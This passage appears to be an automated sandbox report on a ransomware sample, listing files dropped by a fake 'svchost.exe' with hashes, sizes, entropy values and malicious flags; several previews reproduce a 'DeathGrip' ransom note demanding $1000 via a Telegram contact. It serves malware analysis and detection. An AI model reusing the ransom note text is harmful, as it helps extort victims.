                                                          SHA1:0DE590DEF42762CF89C0A51A40EC534E6459A288
                                                          SHA-256:C5D220C78C28829F70BCE44AE17293AEA3FCFC209898787060B64C482BB85826
                                                          SHA-512:3924F1A6193B972D2B4A6659E644F84DCC0846EC964AA79F98E6D76A0E6FF078DE3E99587FE14FB2FF4D8972BDCCB9180535A9BC03CE918BFE62DC879DB3923F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):45024
                                                          Entropy (8bit):7.996057261558134
                                                          Encrypted:true
                                                          SSDEEP:768:/dLWKSknxAQBlbmXsN28Fkmh375LUJ4sm5GU/gXlql0I8qE2S42DSmk:/dLWzkxAwlbXPCjUInIDE2SsF
                                                          MD5:7BD4FF15FE923BA6F1CB1BF28595ED2A
                                                          SHA1:B8CB57E0ADD2A3C5A9215EF299F2AB449DF87A2A
                                                          SHA-256:039D8CBCD27589C75C60DA4B37D331B3CC15FBF810F1A2BB8CDDD96CFA0EE538
                                                          SHA-512:0F22316FE213F6E66703141204F0DB21BF930DF684678C1CD9C0DD8375D1089E95A1FFBB388A978B97759B27E22B1570C74BAF3AD7D01B1A132CB45E6F1A50FD
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.974320509213886
                                                          Encrypted:false
                                                          SSDEEP:192:YK7/zfSF4P6U1hYoHTxKE+HitOirsPtAZ3zYZdfTXmQezqCSi7:d7jSFo6uhY8NK6tLomAdfTXmQALSs
                                                          MD5:AE08855151679841809FB4D2CC5BD5FB
                                                          SHA1:E95588A3C3A425744EF86454F9B40CE8B66EC47B
                                                          SHA-256:A4A3B911EC7E41703C2FCED57E0F6B3C43C21AF8F3A330B8E181A25956F627AC
                                                          SHA-512:7BE5768B610DA6B682DD4D9562048110ECCFB68B5F6D347D7BD26296A2FBEDA2578CB13A1FC09D042115FF065FBA5BDD4EC4581EDD7D98D212162141460FC35E
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4384
                                                          Entropy (8bit):7.94423617676248
                                                          Encrypted:false
                                                          SSDEEP:96:wez6GnGJ5oWnHW6Q68e8xDp6Bwlxvv9kMvvx9/f88h0eO+Fbth:7z6Gnef2B1peIvuMv59/k4bth
                                                          MD5:4BC1F5162B8BF6FBCAF2529CD52573EB
                                                          SHA1:AF8425554B6524E61BD102F9B6D57658FD1A26B4
                                                          SHA-256:564CF7E0819F6436F4207D2EA40BB2DAD8A832AAC2F2D2C6605E40FCDB894E69
                                                          SHA-512:A712D83A644A87C1A3B0691A98EBDAAA2C0205F390AE367D5B039814D06B0AB7FE1E27F56FE34F41FD9922B2CCC54D42437F59DC980C2CE63FA5B4A0A77F5C06
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12304
                                                          Entropy (8bit):7.983917713328329
                                                          Encrypted:false
                                                          SSDEEP:384:FXeINh/XXNzeZCECxjx1B8RXNc8Ap/5ebYGbGo3:DNh/XdPECP1B4XDicRao
                                                          MD5:18763CFBAB62ADB1532FC33F988BA93E
                                                          SHA1:E44D65F70820E53D57528E536032B4ADBCEF2E2D
                                                          SHA-256:4950F2FE7F31CA1B27EAA37DF1EC8E828B22BD0F5F97B109B53BD1722BDFE1BA
                                                          SHA-512:CB7BE167117714F680EAF6CA7941930FC47EE7673FC13AEC5555C71868113F851F41834AA7D7F0EA1A51B70999271E1959B758AFA5D17F4F34E776B6A38288DE
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.104379284989339
                                                          Encrypted:false
                                                          SSDEEP:6:bV3Q3UoLd6yJqppkFnHkLsLzjLPE12w7ohPq25n/T9khnSVY5DXIsaYP5EqDLEup:hQkoTJGokLu7PzSoAoBOksRaYPIuat1G
                                                          MD5:2791302E8CEFC4BB0F344D3DFC7571D5
                                                          SHA1:3060AA62980C6C117D55B4F94EBAD7C0F525C306
                                                          SHA-256:E5EE89720748F80DA5C9788518892D55435B409E6382E22AF9A637DF5FCDDD46
                                                          SHA-512:252509B97947B177C54BE506B919212FBFE6E5BF0AD34CCC7604C4B6714F01733C393EF5337A8441D907B082599A5E58AC8868B78ADC9CBD7D5B9D2A9030BDC6
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6288
                                                          Entropy (8bit):7.967234313204805
                                                          Encrypted:false
                                                          SSDEEP:192:CgG0/o2zcB503NcYeA6d5eY7F9JT3+u/fIkNTVjNbL:fjNzcBu3NnhmfJTZI+jJ
                                                          MD5:35F22BE46CD2E5EBD16DFBCDE4A5331E
                                                          SHA1:F6B9D94A975B03D126FF42E73D90CB5CAC21A860
                                                          SHA-256:EDDA6BB70898B72D15B813F48B45B53E01C0730165059155D85FAAD64354454C
                                                          SHA-512:FE91DD3CA26CA3C54FC4B7DE452E9E4C7EBB2A4DA4CA8E4C090EAFBF85E8A1EBAD092A78AFD47611FA5A112623E9AC3A066BD26BD027AC03735A4209919EAEE0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):36720
                                                          Entropy (8bit):7.995028162241055
                                                          Encrypted:true
                                                          SSDEEP:768:49DAYP1qK6HO+vsuzOYo28M85w68wJd5bUZFUA0XJQuvTtyODhi:0Ay1qKdmOZFw5wJdcFvSJQuLcODI
                                                          MD5:828F82CC7F385602AA24067E3431BA7F
                                                          SHA1:55CAD6C5786941F9278B8A687ECC5EE6234F5502
                                                          SHA-256:4D490C75CD0C74FF4F18F6E9D0722FA0C371D0B000A6057F7BA72FEB411FCC5B
                                                          SHA-512:68385593445E748B2A9C334821008DE720431605DABC8E62534CC707E76E884AAB0C0A2CC00F7E2B3358DAE9CFF0EDFB92E666A5A50C8C9B1440DFE1143CA059
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):22112
                                                          Entropy (8bit):7.990912630033864
                                                          Encrypted:true
                                                          SSDEEP:384:i98gZzfPlsXE1p3SSleg1FxnSfjhR91mU9ewQDTIadJc3mS+YQ1YQnWKR:m8ghPl4EmKegXxnS1D1ZdSIaUA3nR
                                                          MD5:FFC1906E96A1FBB435769D67929752B9
                                                          SHA1:791DD6227360DDEE39B63B6F97C006054A639464
                                                          SHA-256:F4EA90DF451F9591FF58DD8824E83BE209B1185EABE502CB85C9BF9C0C269509
                                                          SHA-512:C0EAC6918FA52E4C742B0D699046EB4300D16DEA1E59503247C18072B4C5673FE79ADC3A7E81084873D721C5E5332BF8105FB15152B3F6BB8FA9884FCD02E15E
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1056
                                                          Entropy (8bit):7.586940602545
                                                          Encrypted:false
                                                          SSDEEP:24:JR0Cq4AeeMP8I2PFICh6RIR4mi5JlPxcvgRy7W5DzdZs904:JR04hFP8I2JweRRi5Jgvg07ijw
                                                          MD5:6C3F526C6CE847325AC18FB4C2526368
                                                          SHA1:3D1304D32951E49752FF4A1355722794BC922F3F
                                                          SHA-256:09111CD2748DCCA46C769CD51856D4D0211F0469ACAEF38C93EB506F65BAE5DE
                                                          SHA-512:0B4C2DE02084E38E4F6174DB44F41747EC1D006C2EE1C09AFA1BBDFF6F3F9BD0029B57923974CF2B00673B0E23245B8BE9161370DDE34D6EA88C46BDDA3EDA46
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):464
                                                          Entropy (8bit):6.649203610563169
                                                          Encrypted:false
                                                          SSDEEP:12:xRjS1eGLqzeucEipgPbM25eGzVBmM70vNxM:x5SnLqNcEzMSeupkxM
                                                          MD5:54C1C3387B242B3F790966FE4A2B4F09
                                                          SHA1:BAFBD55EFDBC8B73A7616901A9B151357DA85FFB
                                                          SHA-256:223E6744F1C97E70C9817E0D5BF019B7E6BBBDCCD08F1CCD1D8BD619A2E54F27
                                                          SHA-512:2197AB8A94D0802C8AFD336AE28F37EE4FED4611006C68E15D1F6488EABAAF1D5427C374D52EA638FB1B1559A105899ACD3817F3CE64F0F9A0056E28CF2ED8F9
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1840
                                                          Entropy (8bit):7.845766525622224
                                                          Encrypted:false
                                                          SSDEEP:48:U7SNcUMc7WhckF5ZfRizlmOyr9h+cQXX6D:YSIcSFF5Z5mlmOyrPBQn2
                                                          MD5:89B4AF70E7556C33B79763038662E658
                                                          SHA1:97C70EB8FB7F6E83485F47572B7CC8D64D8AA030
                                                          SHA-256:FB1BB4C413DB076A34269BB70B418154433719EBCC9E5CA0F1A3A17675C61419
                                                          SHA-512:73AAC50F7696C657444601DD23BE430E75D49CC322CB4373A2320930983CB069D433D7808D298559A664300EDFD90D9EEB6AF6028363FBBB9DBAE4BAA4C4976B
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):480
                                                          Entropy (8bit):6.702580710669612
                                                          Encrypted:false
                                                          SSDEEP:12:IctS0Dc+s8gmgnBZ5+TqAXfg5GliRxGE8vqPhvqhcT:Bg+s8EycGERxl8vqZvP
                                                          MD5:20389B5EAD4981688BD5D1B4A1B81DDF
                                                          SHA1:E3FAE9832BDF5DFA518D91C1F6DAAF5CFE47B701
                                                          SHA-256:1B2843D90BA68057134CDD35E64D5D6A6A6EBE5875BBDBB8AA73599EC7605A7B
                                                          SHA-512:D04AB463D9349827AF5BFA2E56F2F2E790CB56D089ECA85465654C56663F777323056E6034D6269BCF48F4244F360F020340DDB921ADFC935F9142889AE5627D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):6.771119588123648
                                                          Encrypted:false
                                                          SSDEEP:12:fiZmynEL+NrSyx7HRmH+95DBUqjaNzmlnGdtBbKNcNvCgosHLpyU1CFZ:KQynrYyNRo+95B5aQlnGnIWo2LwhZ
                                                          MD5:D262BA777BB3C7ECD59D00448217EC89
                                                          SHA1:566828853926414F03ECFE30A80B9097582F0F92
                                                          SHA-256:8C133A379843FFCE0FC6378F9EFC9EE2640F46F4465F3A54C6C8F556CC4234A1
                                                          SHA-512:68F72BB2D939B374654BFC876234981F1FB92A5BFFF755C3730086AC6BFEFCE99624629BFDA8F1F6A9A94B9C1FDD63DCC0EE66925F3A5D421C39C875495715A1
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):464
                                                          Entropy (8bit):6.671393561016944
                                                          Encrypted:false
                                                          SSDEEP:12:GwHUrmGUgUoOy8zNODFg5BfchvUxhEC59rN80cwzvVv:RHUrmNZNz4Fg5jEC5nGwl
                                                          MD5:8CDF861ECF917FD2F896F76BEE43D3F5
                                                          SHA1:6A8ED0999208E2FCC0ED6CA36363706715F63C77
                                                          SHA-256:9869B2F0703BFC67D657E2A33C7DCF273D05F56E80E027A077236CAC0DC7AA71
                                                          SHA-512:C3F02617E72FFF649D838657DDCB85914B0A0C8D98DF2485B8DDF5C486335025235B70B16D22A5015BE1763C44F20305CAA15AF0685B6994ABFD71D6F83F4A11
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.462509596197924
                                                          Encrypted:false
                                                          SSDEEP:24:ceAl/RT8OVWDpudteh7dF5hNv+xgHPdWIv5:ceqR8O0Dmch7b5b0gHPwIR
                                                          MD5:784A2CAF4CF71443564E3786B1556031
                                                          SHA1:519F6C24FB489E8E721F71DC2CC658F0D89878D9
                                                          SHA-256:C1C73AAE7256C58300F6198D5DD3111E94B5EDEFB857DAE8E7149E7ABC33425F
                                                          SHA-512:A6A23CC7C4DA68C637D2F27B6E130F2A31FA1ACD17D54F2977ECD8A2CF10B3C7B04E2052D288FE1D585BA0BEC707054C4984E30D04F723C494D8CCB4442F09D0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):480
                                                          Entropy (8bit):6.710810972919869
                                                          Encrypted:false
                                                          SSDEEP:12:scb3Ltc/gjKv1UGkRgpxnMK2Cm8ZgAS+BzRM:scb3Zcoj91Y5MKtmygYRM
                                                          MD5:11C50039B99DF4E9BBF2523E6E92D229
                                                          SHA1:7D2B092DEC4EB5BEC7762F524B9BF1634CEAB2D6
                                                          SHA-256:7272229F7E1B7F01A076655C309328ED91D52CDBED20F16FADAEC6BF587BFE15
                                                          SHA-512:4C98C8137FF8F25CEA5A8360E32B4AC5FAFAFEC678466F75A47A03FE836A04525F4DB37803112C779867EB95F5DFD1FC59A46FF3B380F2457C6CEEBA030C4D2D
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):6.809973381523657
                                                          Encrypted:false
                                                          SSDEEP:12:86iCSfwjIRsNbDaF+RnZcqhj9WLpe8Xgcy/fMHv:8eSbRsNbG0RiqhAE3XMP
                                                          MD5:C8FA35A09041A66E4517D729DCFC621E
                                                          SHA1:B32451E49A76E3C909D1F717DABA3D634403067C
                                                          SHA-256:A0CE6289737C30882F09CA87A8390306729284111ED3445262FD9FDF7786A309
                                                          SHA-512:C9F10E9FC42B29DC220604180C28347BAAE470074D34981B77F3AF878256EFEC0903882CFEBAD9E4ACAAC03480E4E46EDF8FD51A5C5E122417B5385B85F248C9
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1648
                                                          Entropy (8bit):7.8193323525193295
                                                          Encrypted:false
                                                          SSDEEP:24:8rNdWACkkHWPPeRU8d8x8WwjQkuvv/U/Yd/8q5uLTocyO8MrPbApKWyonWN0wXY2:8rNNCkkHWPPv8VJuoS8To8dOWP
                                                          MD5:58DD93E55EE77AEDB5936F214699F6D3
                                                          SHA1:60790E5CFDEDD349DD3153FF1773A945BD6DF49F
                                                          SHA-256:CB07150CB95F64453146203A6914120DE18D5E703973BDDECCF146FC9DF57BB3
                                                          SHA-512:42AA7894A7C24003AEB7F0C634E810CC147AF72AD68D08C2F38044FA8AF7DDB416BF94E4484086799881DC4E3738DAA148882EB02028F890CFB1CFA87F2730B4
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):6.8631526645920955
                                                          Encrypted:false
                                                          SSDEEP:12:639HXeAWNWCbS6/0h3CpLDZAudhsHOuOKlATLTx3CZiBCC:6tHXEWCGhyVPhEOKSTLlCeCC
                                                          MD5:05627224BE28E98026EF328162BF4F86
                                                          SHA1:D671EF4D7FBED057905B040A19A25F7F7959A9E4
                                                          SHA-256:BD4F5A7C73CD208B6532ACA6E4021FC9A84717EC225F1EA590564281670C6C17
                                                          SHA-512:95A5C522CDC5518184E396D32D079414D53E2D7DEE553FE0C08CF230166E951EDDF2D274D574717B2666B18EC43A29BE421C79674A347FDD9337E7892B20129A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1408
                                                          Entropy (8bit):7.73779078742812
                                                          Encrypted:false
                                                          SSDEEP:24:rCPbfrNEyAEwnNsF4K1ZgMlPXO9E40rjxV6lEHuSutJQxpnFa/JL3EeF:raoEwNw7bPXOajxVUaew+LT
                                                          MD5:3B4EA70980080CE595CF8442137B33EA
                                                          SHA1:624A8BB3AD1156DCEDF15B8268C2D83429C8B979
                                                          SHA-256:1A43A17DCCDC704EB95C88A29F04C2E3615389A10C66E43AC1A3309BA9D4C428
                                                          SHA-512:2FCA39C5AB621366B0F44CF4A1B30A564EE0B184E76EFD24A89BC1917A0C66259B9969C3A3D45442E0A3CAF1320BD0909026C14044EF3F7048AC51D64EB3B207
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.7957105177902175
                                                          Encrypted:false
                                                          SSDEEP:24:cafd4i+C/o253gBVsUgCE4aUy8Ybj2g9x02tj2vhH8JaAUEJ1:rHvmYPCEUyV2g9u2IvhwabEJ1
                                                          MD5:DFB5099AB26A85DD6ACDF26E52608269
                                                          SHA1:3D1A0161FDECA5129CF5F89D092A2EF83A734C92
                                                          SHA-256:995D2D2762BF8D83ECCD61B7EEFF0C5FF9B69A04AB13BA285B53489E1D5F4F90
                                                          SHA-512:A634248814F272EC6D197AAF2EEE4445A0402AAC260B43B0AB5AD5C9F06F0F30A5B7C2211D3914614A2FB30ACE3E9CDF558B1A6D71493C4444F3B044C43E1161
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.740304340690895
                                                          Encrypted:false
                                                          SSDEEP:24:U96XxSibG0t3cRARP3trUC+A/j3LQKex04d8Bw9yg9GP5sxcH9T5vixmuVQumZf8:26hpbYR2rUCp/j30KeO4dgaDQscH9T9M
                                                          MD5:669A4ED394EAFAF38F56994C05F68AF6
                                                          SHA1:0D7BD3B9EA2C1813705531299F3822C060704491
                                                          SHA-256:C72A051006A97515133276CA607DD5D78BCBA699E6FB1D30FB5F91084CD52D3A
                                                          SHA-512:7A8F1652796FB2B4B256E3E277FA24642C42F32EF11487BF5F3AD53A548CE06E896A71BD90A5506C491DC13C395CB1D5E265B910508410C5EB41560395FDEA37
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
